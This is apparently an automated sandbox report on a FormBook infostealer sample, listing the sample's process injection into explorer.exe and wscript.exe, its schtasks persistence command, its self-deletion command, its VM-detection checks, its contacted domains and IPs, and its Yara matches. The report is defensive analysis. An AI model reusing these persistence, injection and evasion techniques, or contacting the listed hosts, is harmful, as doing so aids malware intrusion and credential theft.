          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskeng.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameesrb.dll.muiH vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamestobject.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAltTab.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewscui.cpl.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametquery.dll.mui@ vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameesent.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametwext.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamempr.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMSHTML.DLL.MUID vs ejecutable2.exe
          Source: ejecutable2.exe, 00000004.00000002.487824120.0000000000AD0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs ejecutable2.exe
          Source: ejecutable2.exe, 00000004.00000000.422762878.00000000011E4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
          Source: ejecutable2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CmsVPZkxbOtm.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76E90000 page execute and read and write
          Source: ejecutable2.exe Virustotal: Detection: 27%
          Source: C:\Users\user\Desktop\ejecutable2.exe File read: C:\Users\user\Desktop\ejecutable2.exe
          Source: ejecutable2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ejecutable2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................,.........E.R.R.O.R.:. ...d.......`.......................................................x.%.......................,.....
          Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................,.........E.R.R.O.(.P.....d.......`...............................................................X.................,.....
          Source: unknown Process created: C:\Users\user\Desktop\ejecutable2.exe 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
          Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
          Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Users\user\Desktop\ejecutable2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\ejecutable2.exeFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeFile created: C:\Users\user\AppData\Local\Temp\tmp86AE.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/3@7/7
          Source: C:\Users\user\Desktop\ejecutable2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: ejecutable2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ejecutable2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
          Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: ejecutable2.exe, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 0_2_0033E345 push ss; retn 0033h
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 0_2_048C4649 push esp; ret
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_00415B53 push ds; ret
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_00415B1A push ds; ret
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_00415CE2 push 81CAEFA2h; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_0239DFA1 push ecx; ret
          Source: initial sample | Static PE information: section name: .text entropy: 6.99221568577
          Source: initial sample | Static PE information: section name: .text entropy: 6.99221568577
          Source: C:\Users\user\Desktop\ejecutable2.exe | File created: C:\Users\user\AppData\Roaming\CmsVPZkxbOtm.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\cmd.exe | File deleted: c:\users\user\desktop\ejecutable2.exe
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process information set: NOOPENFILEERRORBOX (this entry is repeated 25 times in the report)
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 0.2.ejecutable2.exe.262ecec.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.424438137.000000000265F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: ejecutable2.exe PID: 2548, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\ejecutable2.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 0000000000078604 second address: 000000000007860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2576 | Thread sleep time: -31446s >= -30000s
          Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2652 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2572 | Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 2680 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\ejecutable2.exe | Thread delayed: delay time: 31446
          Source: C:\Users\user\Desktop\ejecutable2.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: ejecutable2.exe, 00000000.00000002.424014627.000000000059F000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_023A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\ejecutable2.exe | Code function: 4_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\ejecutable2.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.branchwallet.com
          Source: C:\Windows\explorer.exe | Domain query: www.wwiilive.com
          Source: C:\Windows\explorer.exe | Network Connect: 5.101.152.161 80
          Source: C:\Windows\explorer.exe | Network Connect: 35.168.81.157 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exe | Domain query: www.tunetel.com
          Source: C:\Windows\explorer.exe | Domain query: www.play-to-escape.com
          Source: C:\Windows\explorer.exe | Domain query: www.yhomggsmtdynchb.store
          Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.222 80
          Source: C:\Windows\explorer.exe | Domain query: www.iptechcm.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.pizza-mio.com
          Source: C:\Windows\explorer.exe | Network Connect: 195.77.116.8 80
          Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.77 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\ejecutable2.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: AB0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\ejecutable2.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\ejecutable2.exe | Memory written: C:\Users\user\Desktop\ejecutable2.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\ejecutable2.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\ejecutable2.exe | Thread register set: target process: 1764
          Source: C:\Users\user\Desktop\ejecutable2.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 1764
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
          Source: C:\Users\user\Desktop\ejecutable2.exe | Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: C:\Users\user\Desktop\ejecutable2.exe | Queries volume information: C:\Users\user\Desktop\ejecutable2.exe VolumeInformation

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter1 | Scheduled Task/Job1 | Process Injection612 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job1 | Boot or Logon Initialization Scripts | Scheduled Task/Job1 | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Shared Modules1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information3 | Cached Domain Credentials | System Information Discovery111 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing12 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          Behavior Graph ID: 491547, Sample: ejecutable2.exe, Startdate: 27/09/2021, Architecture: WINDOWS, Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

          Process tree (as drawn in the graph):
          ejecutable2.exe (started)
              dropped: C:\Users\user\AppData\Local\...\tmp86AE.tmp (XML); C:\Users\user\AppData\...\CmsVPZkxbOtm.exe (PE32)
              signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
